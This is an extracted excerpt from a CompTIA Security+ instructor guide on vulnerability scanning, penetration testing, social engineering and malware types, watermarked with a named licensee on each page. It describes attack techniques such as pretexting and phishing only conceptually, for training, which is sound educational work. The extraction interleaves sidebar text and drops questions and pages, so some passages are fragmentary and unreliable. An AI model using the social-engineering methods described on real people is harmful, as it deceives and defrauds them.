Security Concerns with General
Vulnerability Types
Answer the following questions:
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 57
Topic 3C
Summarize Vulnerability
Scanning Techniques
Network reconnaissance and discovery is used to identify hosts, network topology, Show Slide(s)
and open services/ports, establishing an overall attack surface. Various types of
security assessments can be used to test these hosts and services for vulnerabilities.
Security Assessments
There are many models and frameworks for conducting security assessments. A good
starting point is NIST's Technical Guide to Information Security Testing and Assessment Teaching
(nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-115.pdf). SP 800-115 Tip
identifies three principal activities within an assessment:
Relate vulnerability
• Testing the object under assessment to discover vulnerabilities or to prove the scanning to other
effectiveness of security controls. types of security
assessment. Note
• Examining assessment objects to understand the security system and identify any that most types
of vulnerability
logical weaknesses. This might highlight a lack of security controls or a common assessment can be
misconfiguration. performed using
automated tools.
• Interviewing personnel to gather information and probe attitudes toward and
understanding of security.
An automated scanner must be configured with signatures and scripts that can Vulnerability Scan
correlate known software and configuration vulnerabilities with data gathered from Types
each host. Consequently, there are several types of vulnerability scanners optimized
for different tasks.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
58 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Greenbone OpenVAS vulnerability scanner with Security Assistant web application interface as installed
on Kali Linux. (Screenshot used with permission from Greenbone Networks, http://www.openvas.org.)
The first phase of scanning might be to run a detection scan to discover hosts on a
particular IP subnet. In the next phase of scanning, a target range of hosts is probed
to detect running services, patch level, security configuration and policies, network
shares, unused accounts, weak passwords, anti-virus configuration, and so on.
Each scanner is configured with a database of known software and configuration
vulnerabilities. The tool compiles a report about each vulnerability in its database that
was found to be present on each host. Each identified vulnerability is categorized and
assigned an impact warning. Most tools also suggest remediation techniques. This
information is highly sensitive, so use of these tools and the distribution of the reports
produced should be restricted to authorized hosts and user accounts.
Network vulnerability scanners are configured with information about known
vulnerabilities and configuration weaknesses for typical network hosts. These scanners
will be able to test common operating systems, desktop applications, and some
server applications. This is useful for general purpose scanning, but some types of
applications might need more rigorous analysis.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 59
An automated scanner needs to be kept up to date with information about known Common
vulnerabilities. This information is often described as a vulnerability feed, though the Vulnerabilities and
Nessus tool refers to these feeds as plug-ins, and OpenVAS refers to them as network Exposures
vulnerability tests (NVTs). Often, the vulnerability feed forms an important part of scan
vendors' commercial models, as the latest updates require a valid subscription to
acquire.
The CVE dictionary provides the principal input for NIST's National Vulnerability
Database (nvd.nist.gov). The NVD supplements the CVE descriptions with additional
analysis, a criticality metric, calculated using the Common Vulnerability Scoring
System (CVSS), plus fix information.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
60 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Score Description
0.1+ Low
4.0+ Medium
7.0+ High
9.0+ Critical
Scan intrusiveness is a measure of how much the scanner interacts with the target.
Non-intrusive (or passive) scanning means analyzing indirect evidence, such as the
types of traffic generated by a device. A passive scanner, the Zeek Network Security
Monitor (zeek.org) being one example, analyzes a network capture and tries to identify
policy deviations or CVE matches. This type of scanning has the least impact on the
network and on hosts, but is less likely to identify vulnerabilities comprehensively.
Passive scanning might be used by a threat actor to scan a network stealthily. You might
use passive scanning as a technique where active scanning poses a serious risk to system
stability, such as scanning print devices, VoIP handsets, or embedded systems networks.
Active scanning means probing the device's configuration using some sort of network
connection with the target. Active scanning consumes more network bandwidth and
runs the risk of crashing the target of the scan or causing some other sort of outage.
Agent-based scanning is also an active technique.
The most intrusive type of vulnerability scanner does not stop at detecting a
vulnerability. Exploitation frameworks contain default scripts to try to use a
vulnerability to run code or otherwise gain access to the system. This type of highly
intrusive testing is more typical of penetration testing than automated vulnerability
scanning.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 61
A non-credentialed scan is one that proceeds by directing test packets at a host Credentialed versus
without being able to log on to the OS or application. The view obtained is the one Non-Credentialed
that the host exposes to an unprivileged user on the network. The test routines may Scanning
be able to include things such as using default passwords for service accounts and
device management interfaces, but they are not given privileged access. While you
may discover more weaknesses with a credentialed scan, you sometimes will want
to narrow your focus to think like an attacker who doesn't have specific high-level
permissions or total administrative access. Non-credentialed scanning is often the
most appropriate technique for external assessment of the network perimeter or
when performing web application scanning.
A credentialed scan is given a user account with log-on rights to various hosts,
plus whatever other permissions are appropriate for the testing routines. This
sort of test allows much more in-depth analysis, especially in detecting when
applications or security settings may be misconfigured. It also shows what an
insider attack, or one where the attacker has compromised a user account, may
be able to achieve. A credentialed scan is a more intrusive type of scan than
non-credentialed scanning.
Configuring credentials for use in target (scope) definitions in Greenbone OpenVAS as installed on Kali
Linux. (Screenshot used with permission from Greenbone Networks, http://www.openvas.org.)
Create dedicated network accounts for use by the vulnerability scanner only. Ensure that the
credentials for these accounts are stored securely on the scan server.
Show Slide(s)
A scanning tool will generate a summary report of all vulnerabilities discovered during Teaching
the scan directly after execution completes. These reports color-code vulnerabilities Tip
in terms of their criticality, with red typically denoting a weakness that requires
Students need to
immediate attention. You can usually view vulnerabilities by scope (most critical across know the meanings of
all hosts) or by host. The report should include or link to specific details about each false positive and false
vulnerability and how hosts can be remediated. negative.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
62 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Scan report listing multiple high-severity vulnerabilities found in a Windows host. (Screenshot:
Greenbone Community Edition greenbone.net/en/community-edition.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 63
As well as matching known software exploits to the versions of software found running Configuration Review
on a network, a vulnerability scan assesses the configuration of security controls and
application settings and permissions compared to established benchmarks. It might
try to identify whether there is a lack of controls that might be considered necessary or
whether there is any misconfiguration of the system that would make the controls less
effective or ineffective, such as anti-virus software not being updated, or management
passwords left configured to the default. Generally speaking, this sort of testing
requires a credentialed scan. It also requires specific information about best practices
in configuring the particular application or security control. These are provided by
listing the controls and appropriate configuration settings in a template.
Security content automation protocol (SCAP) allows compatible scanners to determine
whether a computer meets a configuration baseline. SCAP uses several components to
accomplish this function, but some of the most important are:
• Open Vulnerability and Assessment Language (OVAL)—an XML schema for
describing system security state and querying vulnerability reports and information.
Comparing a local network security policy to a template. The minimum password length set
in the local policy is much less than is recommended in the template.
(Screenshot used with permission from Microsoft.)
Some scanners measure systems and configuration settings against best practice
frameworks. This is referred to as a compliance scan. This might be necessary for
regulatory compliance or you might voluntarily want to conform to externally agreed
standards of best practice.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
64 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 65
to correlate threat data against on-premises data from network traffic and logs. This
process may also be partially or wholly automated using AI-assisted analysis and
correlation.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
66 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Vulnerability Scanning Techniques
Answer the following questions:
Verify that the vulnerability feed/plug-in/test has been updated with the specific CVE
that you need to test for.
False positive.
Collecting network traffic and log data from multiple sources and then analyzing
it manually will require many hours of analyst time. The use of threat feeds and
intelligence fusion to automate parts of this analysis effort would enable a much
swifter response.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 67
Topic 3D
Explain Penetration Testing Concepts
A penetration test—often shortened to pen test—uses authorized hacking techniques Penetration Testing
to discover exploitable weaknesses in the target's security systems. Pen testing is also
referred to as ethical hacking. A pen test might involve the following steps: Teaching
Tip
• Verify a threat exists—use surveillance, social engineering, network scanners, and
vulnerability assessment tools to identify a vector by which vulnerabilities that could Make sure students
can distinguish
be exploited.
vulnerability
assessment from pen
• Bypass security controls—look for easy ways to attack the system. For example, if
testing.
the network is strongly protected by a firewall, is it possible to gain physical access
to a computer in the building and run malware from a USB stick?
The key difference from passive vulnerability assessment is that an attempt is made
to actively test security controls and exploit any vulnerabilities discovered. Pen testing
is an intrusive assessment technique. For example, a vulnerability scan may reveal
that an SQL Server has not been patched to safeguard against a known exploit. A
penetration test would attempt to use the exploit to perform code injection and
compromise and "own" (or "pwn" in hacker idiom) the server. This provides active
testing of security controls. Even though the potential for the exploit exists, in practice
the permissions on the server might prevent an attacker from using it. This would not
be identified by a vulnerability scan, but should be proven or not proven to be the case
by penetration testing.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
68 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Teaching than a vague type of "Break into the network" aim. There may be systems and data
Tip that the penetration tester should not attempt to access or exploit. Where a pen test
Make sure students involves third-party services (such as a cloud provider), authorization to conduct the
can distinguish test must also be sought from the third party.
between black box,
white box, and gray The Pentest-Standard website provides invaluable commentary on the conduct of pen tests
box. (pentest-standard.readthedocs.io/en/latest/tree.html).
Attack Profile
Attacks come from different sources and motivations. You may wish to test both
resistance to external (targeted and untargeted) and insider threats. You need to
determine how much information about the network to provide to the consultant:
• Black box (or unknown environment)—the consultant is given no privileged
information about the network and its security systems. This type of test would
require the tester to perform a reconnaissance phase. Black box tests are useful for
simulating the behavior of an external threat.
A test where the attacker has no knowledge of the system but where staff are informed
that a test will take place is referred to as a blind (or single-blind) test. A test where staff
are not made aware that a pen test will take place is referred to as a double-blind test.
Bug Bounty
Show Slide(s)
A bug bounty is a program operated by a software vendor or website operator where
rewards are given for reporting vulnerabilities. Where a pen test is performed on a
Exercise Types contractual basis, costed by the consultant, a bug bounty program is a way of crowd
sourcing detection of vulnerabilities. Some bug bounties are operated as internal
Teaching programs, with rewards for employees only. Most are open to public submissions
Tip (tripwire.com/state-of-security/security-data-protection/cyber-security/essential-bug-
Note that purple is not bounty-programs).
necessarily a separate
team (possibly one
or more facilitators), Exercise Types
but a different way
of structuring the Some of the techniques used in penetration testing may also be employed as an
exercise. exercise between two competing teams:
You might want
to note the use of • Red team—performs the offensive role to try to infiltrate the target.
"rainbow" teams
to include DevOps • Blue team—performs the defensive role by operating monitoring and alerting
(blackhat.com/docs/ controls to detect and prevent the infiltration.
us-17/wednesday/
us-17-Wright-Orange- There will also often be a white team, which sets the rules of engagement and
Is-The-New-Purple-wp. monitors the exercise, providing arbitration and guidance, if necessary. If the red team
pdf). is third party, the white team will include a representative of the consultancy company.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 69
One critical task of the white team is to halt the exercise should it become too risky. For
example, an actual threat actor may attempt to piggyback a backdoor established by
the red team.
In a red versus blue team exercise, the typical process is for the red team to attempt
the intrusion and either succeed or fail, and then to write a summary report. This
confrontational structure does not always promote constructive development and
improvement. In a purple team exercise, the red and blue teams meet for regular
debriefs while the exercise is ongoing. The red team might reveal where they have been
successful and collaborate with the blue team on working out a detection mechanism.
This process might be assisted by purple team members acting as facilitators. The
drawback of a purple team exercise is that without blind or double-blind conditions,
there is no simulation of a hostile adversary and the stresses of dealing with that.
Analysis of adversary TTPs has established various "kill chain" models of the way Passive and Active
modern cyber-attacks are conducted. A penetration testing engagement will generally Reconnaissance
use the same sort of techniques.
Teaching
In the first reconnaissance phase for black box testing, the pen tester establishes a
Tip
profile of the target of investigation and surveys the attack surface for weaknesses.
Reconnaissance activities can be classed as passive or active. Passive reconnaissance is Make sure students
understand the
not likely to alert the target of the investigation as it means querying publicly available
terminology and
information. Active reconnaissance has more risk of detection. Active techniques might can distinguish
involve gaining physical access to premises or using scanning tools on the target's web passive from active
services and other networks. techniques.
• Open Source Intelligence (OSINT)—using web search tools, social media, and
sites that scan for vulnerabilities in Internet-connected devices and services
(securitytrails.com/blog/osint-tools) to obtain information about the target. OSINT
aggregation tools, such as theHarvester (github.com/laramies/theHarvester), collect
and organize this data from multiple sources. OSINT requires almost no privileged
access as it relies on finding information that the company makes publicly available,
whether intentionally or not. This is a passive technique.
• War driving—mapping the location and type (frequency channel and security
method) of wireless networks operated by the target. Some of these networks may
be accessible from outside the building. Simply sniffing the presence of wireless
networks is a passive activity, though there is the risk of being observed by security
guards or cameras. An attacker might be able to position rogue access points, such
as the Hak5 Pineapple (shop.hak5.org/products/wifi-pineapple), or perform other
wireless attacks using intelligence gathered from war driving.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
70 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
around premises, with the expectation that at least some of them will be picked up
and used (blackhat.com/docs/us-16/materials/us-16-Bursztein-Does-Dropping-USB-
Drives-In-Parking-Lots-And-Other-Places-Really-Work.pdf).
• Pivoting—hosts that hold the most valuable data are not normally able to access
external networks directly. If the pen tester achieves a foothold on a perimeter
server, a pivot allows them to bypass a network boundary and compromise servers
on an inside network. A pivot is normally accomplished using remote access and
tunneling protocols, such as Secure Shell (SSH), virtual private networking (VPN), or
remote desktop.
• Actions on Objectives—for a threat actor, this means stealing data from one or
more systems (data exfiltration). From the perspective of a pen tester, it would be a
matter of the scope definition whether this would be attempted. In most cases, it is
usually sufficient to show that actions on objectives could be achieved.
• Cleanup—for a threat actor, this means removing evidence of the attack, or at least
evidence that could implicate the threat actor. For a pen tester, this phase means
removing any backdoors or tools and ensuring that the system is not less secure
than the pre-engagement state.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 71
Review Activity:
Penetration Testing Concepts
Answer the following questions:
1. A website owner wants to evaluate whether the site security mitigates risks
from criminal syndicates, assuming no risk of insider threat. What type of
penetration testing engagement will most closely simulate this adversary
capability and resources?
In a red versus blue team, there is no contact between the teams, and no opportunity
to collaborate on improving security controls. In a purple team exercise, there is
regular contact and knowledge sharing between the teams throughout the progression
of the exercise.
ISPs monitor their networks for suspicious traffic and may block the test attempts. The
pen test may also involve equipment owned and operated by the ISP.
Persistence refers to the tester's ability to reconnect to the compromised host and use
it as a remote access tool (RAT) or backdoor.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
72 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 3
Summary
Teaching You should be able to summarize types of security assessments, such as vulnerability,
Tip threat hunting, and penetration testing. You should also be able to explain general
Check that students procedures for conducting these assessments.
are confident about
the content that has
been covered. If there
Guidelines for Performing Security Assessments
is time, revisit any
content examples that
Follow these guidelines when you consider the use of security assessments:
they have questions • Identify the procedures and tools that are required to scan the attack surface for
about. If you have
vulnerabilities. This might mean provisioning passive network scanners, active
used all the available
time for this lesson remote or agent-based network scanners, and application or web application
block, note the issues, scanners.
and schedule time for
a review later in the • Develop a configuration and maintenance plan to ensure secure use of any
course. credentialed scans and updates to vulnerability feeds.
Interaction • Run scans regularly and review the results to identify false positives and false
Opportunity negatives, using log review and additional CVE information to validate results if
Optionally, discuss necessary.
with students which
security assessments • Schedule configuration reviews and remediation plans, using CVSS vulnerability
they have used in their criticality to prioritize actions.
workplaces, or which
could be of most • Consider implementing threat hunting programs, monitoring advisories and
benefit. bulletins for new threat sources. Note that threat hunting might require investment
in resources to supply intelligence fusion and threat data.
• Consider implementing penetration testing exercises, ensuring that these are set
up with clear rules of engagement for red/blue or purple team exercise types and
black/white/gray box disclosure.
• Run penetration tests using a structured kill chain life cycle, with reconnaissance,
exploitation, persistence, privilege escalation, lateral movement/pivoting, actions on
objectives, and cleanup phases.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 4
Identifying Social
Engineering and Malware
Lesson Objectives
In this lesson, you will:
• Compare and contrast social engineering techniques.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
74 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 4A
Compare and Contrast Social
Engineering Techniques
Social Engineering
• An attacker triggers a fire alarm and then slips into the building during the
Principles confusion and attaches a monitoring device to a network port.
Interaction
Opportunity Social Engineering Principles
Ask whether any Social engineering is one of the most common and successful malicious techniques.
students have
Because it exploits basic human trust, social engineering has proven to be a particularly
been subjected to
social engineering effective way of manipulating people into performing actions that they might not
attempts and what the otherwise perform. To be persuasive, social engineering attacks rely on one or more of
experience was like. the following principles.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 75
Familiarity/Liking
Some people have the sort of natural charisma that allows them to persuade others
to do as they request. One of the basic tools of a social engineer is simply to be affable
and likable, and to present the requests they make as completely reasonable and
unobjectionable. This approach is relatively low-risk as even if the request is refused,
it is less likely to cause suspicion and the social engineer may be able to move on to a
different target without being detected.
Consensus/Social Proof
The principle of consensus or social proof refers to the fact that without an explicit
instruction to behave in a certain way, many people will act just as they think others
would act. A social engineering attack can use this instinct either to persuade the
target that to refuse a request would be odd ("That's not something anyone else has
ever said no to") or to exploit polite behavior to slip into a building while someone
holds the door for them. As another example, an attacker may be able to fool a user
into believing that a malicious website is actually legitimate by posting numerous fake
reviews and testimonials praising the site. The victim, believing many different people
have judged the site acceptable, takes this as evidence of the site's legitimacy and
places their trust in it.
Impersonation simply means pretending to be someone else. It is one of the basic Impersonation and
social engineering techniques. Impersonation can use either a consensus/liking or Trust
intimidating approach. Impersonation is possible where the target cannot verify the
attacker's identity easily, such as over the phone or via an email message.
The classic impersonation attack is for the social engineer to phone into a department,
claim they have to adjust something on the user's system remotely, and get the user to
reveal their password. This specific attack is also referred to as pretexting.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
76 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Making a convincing impersonation and establishing a trust with the target usually
depends on the attacker obtaining privileged information about the organization.
For example, where the attacker impersonates a member of the organization's IT
support team, the attack will be more effective with identity details of the person being
impersonated and the target.
Some social engineering techniques are dedicated to obtaining this type of intelligence
as a reconnaissance activity. As most companies are set up toward customer service
rather than security, this information is typically quite easy to come by. Information
that might seem innocuous—such as department employee lists, job titles, phone
numbers, diaries, invoices, or purchase orders—can help an attacker penetrate an
organization through impersonation.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 77
Identity fraud is a specific type of impersonation where the attacker uses specific Identity Fraud and
details of someone's identity. A typical consumer identity fraud is using someone else's Invoice Scams
name and address to make a loan application or using stolen credit card details to start
a mobile phone contract. Invoice scams are another common type of identity fraud.
The fraudster will usually spoof the invoice details of a genuine supplier, but change
the bank account number. This might rely on the target not double-checking the
account, or it might be combined with a social engineering contact call to convince the
target that the account change is genuine.
Sometimes the terms identity fraud and identity theft are used to distinguish between
making up an identity versus stealing someone else's identity.
• Shoulder surfing—a threat actor can learn a password or PIN (or other secure
information) by watching the user type it. Despite the name, the attacker may not
have to be in close proximity to the target—they could use high-powered binoculars
or CCTV to directly observe the target remotely.
Show Slide(s)
• Lunchtime attacks—most authentication methods are dependent on the physical
security of the workstation. If a user leaves a workstation unattended while logged
on, an attacker can physically gain access to the system. This is often described as a Phishing, Whaling, and
lunchtime attack. Most operating systems are set to activate a password-protected Vishing
screen saver after a defined period of no keyboard or mouse activity. Users should
Teaching
also be trained to lock or log off the workstation whenever they leave it unattended.
Tip
Some of this
Phishing, Whaling, and Vishing terminology is of
limited value, but
Phishing is a combination of social engineering and spoofing. It persuades or tricks students need to learn
it. The basic points
the target into interacting with a malicious resource disguised as a trusted one,
are that "phishing"
traditionally using email as the vector. A phishing message might try to convince the can use any type
user to perform some action, such as installing disguised malware or allowing a remote of communication
access connection by the attacker. Other types of phishing campaign use a spoof method to trick the
website set up to imitate a bank or e‑commerce site or some other web resource that target into interacting
should be trusted by the target. The attacker then emails users of the genuine website with a spoofed
resource, and can
informing them that their account must be updated or with some sort of hoax alert or
either be general
alarm, supplying a disguised link that actually leads to the spoofed site. When the user in nature or highly
authenticates with the spoofed site, their logon credentials are captured. targeted.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
78 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Example phishing email—On the right, you can see the message in its true form as the mail client has
stripped out the formatting (shown on the left) designed to disguise the nature of the links.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 79
could also be perpetrated over any type of instant messaging or Internet messaging
service (SPIM).
Hoaxes, such as security alerts or chain emails, are another common social
engineering technique, often combined with phishing attacks. An email alert or web
pop-up will claim to have identified some sort of security problem, such as virus
infection, and offer a tool to fix the problem. The tool of course will be some sort of
Trojan application. Malvertising exploits the use of space on legitimate websites set
aside for advertising served from content delivery networks (CDNs) without much
oversight (blog.talosintelligence.com/2019/07/malvertising-deepdive.html). Criminals
will also use sophisticated phone call scams to try to trick users into revealing login
credentials or financial account details.
A phishing or hoax email can be made more convincing by prepending. In an offensive
sense, prepending means adding text that appears to have been generated by the mail
system. For example, an attacker may add "RE:" to the subject line to make it appear
as though the message is a reply or may add something like "MAILSAFE: PASSED" to
make it appear as though a message has been scanned and accepted by some security
software. Conversely, some mail systems may perform prepending legitimately,
such as tagging external messages or messages with a warning if they have not been
definitively identified as spam but that do have suspicious elements.
Direct messages to a single contact have quite a high chance of failure. Other social Pharming and
engineering techniques still use spoofed resources, such as fake sites and login pages, Credential Harvesting
but rely on redirection or passive methods to entrap victims.
Teaching
Pharming Tip
Make sure students
Pharming is a passive means of redirecting users from a legitimate website to a can distinguish
malicious one. Rather than using social engineering techniques to trick the user, phishing and
pharming relies on corrupting the way the victim's computer performs Internet name pharming.
resolution, so that they are redirected from the genuine site to the malicious one. For
example, if mybank.foo should point to the IP address 2.2.2.2, a pharming attack would
corrupt the name resolution process to make it point to IP address 6.6.6.6.
Typosquatting
Rather than redirection, a threat actor might use typosquatting. This means that
the threat actor registers a domain name that is very similar to a real one, such
as connptia.org, hoping that users will not notice the difference. These are
also referred to as cousin, lookalike, or doppelganger domains. Typosquatting might
be used for pharming and phishing attacks. Another technique is to register a
hijacked subdomain using the primary domain of a trusted cloud provider, such as
onmicrosoft.com. If a phishing message appears to come from comptia.
onmicrosoft.com, many users will be inclined to trust it.
Watering Hole Attack
A watering hole attack is another passive technique where the threat actor does not
have to risk communicating directly with the target. It relies on the circumstance that a
group of targets may use an unsecure third-party website. For example, staff running
an international e-commerce site might use a local pizza delivery firm. If an attacker
can compromise the pizza delivery firm's website or deploy a type of malvertising,
they may be able infect the computers of the e-commerce company's employees and
penetrate the e-commerce company systems.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
80 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Credential Harvesting
Within the general realm of phishing and pharming, credential harvesting is a
campaign specifically designed to steal account credentials. The attacker may have
more interest in selling the database of captured logins than trying to exploit them
directly. Such attacks will use an alarming message such as "Your account is being used
to host child pornography" or "There is a problem with your account storage" and a link
to a pharming site embroidered with the logos of a legitimate service provider, such as
Google, Microsoft, Facebook, or Twitter. Attacks using malvertising or scripts injected
into shopping cart code are also popular (csoonline.com/article/3400381/what-is-
magecart-how-this-hacker-group-steals-payment-card-data.html). Targeted credential
harvesting might be directed against a single company's password reset or account
management portal.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 81
Review Activity:
Social Engineering Techniques
Answer the following questions:
1. The help desk takes a call and the caller states that she cannot connect to
the e-commerce website to check her order status. She would also like a
user name and password. The user gives a valid customer company name
but is not listed as a contact in the customer database. The user does not
know the correct company code or customer ID. Is this likely to be a social
engineering attempt, or is it a false alarm?
This is likely to be a social engineering attempt. The help desk should not give out any
information or add an account without confirming the caller's identity.
This is a social engineering attempt utilizing a watering hole attack and/or malvertising.
If social engineering, this is spear phishing (the attack uses specific detail) over a voice
channel (vishing). It is possible that it uses deep fake technology for voice mimicry.
The use of a sophisticated attack for a relatively low-value data asset seems unlikely,
however. A fairly safe approach would be to contact the CEO back on a known
mobile number.
4. Your company manages marketing data and private information for many
high-profile clients. You are hosting an open day for prospective employees.
With the possibility of social engineering attacks in mind, what precautions
should employees take when the guests are being shown around the office?
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
82 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 4B
Analyze Indicators
of Malware-Based Attacks
Other classifications are based on the payload delivered by the malware. The payload
is an action performed by the malware other than simply replicating or persisting on
a host. Examples of payload classifications include spyware, rootkit, remote access
Trojan (RAT), and ransomware.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 83
A computer virus is a type of malware designed to replicate and spread from computer Computer Viruses
to computer, usually by "infecting" executable applications or program code. There are
several different types of viruses and they are generally classified by the different types
of file or media that they infect:
• Non-resident/file infector—the virus is contained within a host executable file and
runs with the host process. The virus will try to infect other process images on
persistent storage and perform other payload actions. It then passes control back to
the host program.
• Memory resident—when the host file is executed, the virus creates a new process
for itself in memory. The malicious process remains in memory, even if the host
process is terminated.
• Boot—the virus code is written to the disk boot sector or the partition table of a
fixed disk or USB media, and executes as a memory resident process when the OS
starts or the media is attached to the computer.
• Script and macro viruses—the malware uses the programming features available
in local scripting engines for the OS and/or browser, such as PowerShell, Windows
Management Instrumentation (WMI), JavaScript, Microsoft Office documents with
Visual Basic for Applications (VBA) code enabled, or PDF documents with JavaScript
enabled.
In addition, the term multipartite is used for viruses that use multiple vectors and
polymorphic for viruses that can dynamically change or obfuscate their code to evade
detection.
What these types of viruses have in common is that they must infect a host file or
media. An infected file can be distributed through any normal means—on a disk, on
a network, as an attachment to an email or social media post, or as a download from
a website.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
84 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Unsafe attachment detected by Outlook's mail filter—The "double" file extension is an unsophisticated
attempt to fool any user not already alerted by the use of both English and German in the message
text. (Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 85
at all, however. The malware may change registry values to achieve persistence
(executing if the host computer is restarted). The initial execution of the malware
may also depend on the user running a downloaded script, file attachment, or
Trojan software package.
• Fileless malware may use "live off the land" techniques rather than compiled
executables to evade detection. This means that the malware code uses
legitimate system scripting tools, notably PowerShell and Windows Management
Instrumentation (WMI), to execute payload actions. If they can be executed with
sufficient permissions, these environments provide all the tools the attacker needs
to perform scanning, reconfigure settings, and exfiltrate data.
The terms advanced persistent threat (APT) and advanced volatile threat (AVT) can be
used to describe this general class of modern fileless/live off the land malware.
Another useful classification is low observable characteristics (LOC) attack (mcafee.
com/enterprise/en-us/security-awareness/ransomware/what-is-fileless-malware.html).
The exact classification is less important than the realization that adversaries can use
any variety of coding tricks to effect intrusions and that their tactics, techniques, and
procedures to evade detection are continually evolving.
The first viruses and worms focused on the destructive potential of being able to Spyware and
replicate. As the profitable uses this software became apparent, however, they started Keyloggers
to be coded with payloads designed to facilitate intrusion, fraud, and data theft.
Various types of unwanted code and malware perform some level of monitoring: Teaching
Tip
• Tracking cookies—cookies are plain text files, not malware, but if browser settings
allow third-party cookies, they can be used to record pages visited, search queries, Spyware/keylogger is
a means of classifying
browser metadata, and IP address. Tracking cookies are created by adverts and
malware by its
analytics widgets embedded into many websites. purpose, rather than
vector.
• Adware—this is a class of PUP/grayware that performs browser reconfigurations,
such as allowing tracking cookies, changing default search providers, opening
sponsor's pages at startup, adding bookmarks, and so on. Adware may be installed
as a program or as a browser extension/plug-in.
• Spyware—this is malware that can perform adware-like tracking, but also monitor
local application activity, take screenshots, and activate recording devices, such as a
microphone or webcam. Another spyware technique is perform DNS redirection to
pharming sites.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
86 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Actual Keylogger is Windows software that can run in the background to monitor different kinds of
computer activity (opening and closing programs, browsing websites, recording keystrokes, and
capturing screenshots). (Screenshot used with permission from ActualKeylogger.com.)
Keyloggers are not only implemented as software. A malicious script can transmit key
presses to a third-party website. There are also hardware devices to capture key presses to
a modified USB adapter inserted between the keyboard and the port. Such devices can store
data locally or come with Wi-Fi connectivity to send data to a covert access point. Other
attacks include wireless sniffers to record key press data, overlay ATM pin pads, and so on.
In this context, RAT can also stand for Remote Administration Tool. A host that is under
malicious control is sometimes described as a zombie.
A compromised host can be installed with one or more bots. A bot is an automated
script or tool that performs some malicious activity. A group of bots that are all under
the control of the same malware instance can be manipulated as a botnet by the
herder program. A botnet can be used for many types of malicious purpose, including
triggering distributed denial of service (DDoS) attacks, launching spam campaigns, or
performing cryptomining.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 87
SubSeven RAT. (Screenshot used with permission from Wikimedia Commons by CCAS4.0 International.)
